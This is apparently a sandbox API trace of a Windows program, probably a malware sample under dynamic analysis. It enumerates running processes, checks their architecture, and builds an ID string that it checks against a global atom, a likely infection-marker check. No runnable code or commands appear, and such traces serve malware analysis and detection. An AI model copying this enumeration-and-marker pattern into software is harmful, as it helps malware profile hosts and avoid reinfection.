	[0071.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.993] CloseHandle (hObject=0x224) returned 1
	[0071.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728978, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0071.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.994] CloseHandle (hObject=0x224) returned 1
	[0071.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0071.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.994] CloseHandle (hObject=0x224) returned 1
	[0071.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0071.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.994] CloseHandle (hObject=0x224) returned 1
	[0071.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea40, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0071.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0071.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.994] CloseHandle (hObject=0x224) returned 1
	[0071.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0071.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.995] CloseHandle (hObject=0x224) returned 1
	[0071.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0071.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.995] CloseHandle (hObject=0x224) returned 1
	[0071.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0071.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.995] CloseHandle (hObject=0x224) returned 1
	[0071.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0071.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.995] CloseHandle (hObject=0x224) returned 1
	[0071.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a58, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0071.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.995] CloseHandle (hObject=0x224) returned 1
	[0071.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e7c0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0071.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0071.996] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.996] CloseHandle (hObject=0x224) returned 1
	[0071.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0071.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.996] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.996] CloseHandle (hObject=0x224) returned 1
	[0071.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.996] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.997] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0071.997] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.997] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.998] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetLastError () returned 0x5
	[0071.999] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0071.999] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0071.999] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.000] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.000] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.000] CloseHandle (hObject=0x224) returned 1
	[0072.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.000] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.000] CloseHandle (hObject=0x224) returned 1
	[0072.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e888, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.000] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.000] CloseHandle (hObject=0x224) returned 1
	[0072.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c28) returned 0xc0000004
	[0072.042] VirtualAlloc (lpAddress=0x0, dwSize=0x16d28, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d28, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.044] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.045] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.047] CloseHandle (hObject=0x224) returned 1
	[0072.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.048] CloseHandle (hObject=0x224) returned 1
	[0072.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.048] CloseHandle (hObject=0x224) returned 1
	[0072.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.048] CloseHandle (hObject=0x224) returned 1
	[0072.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.049] CloseHandle (hObject=0x224) returned 1
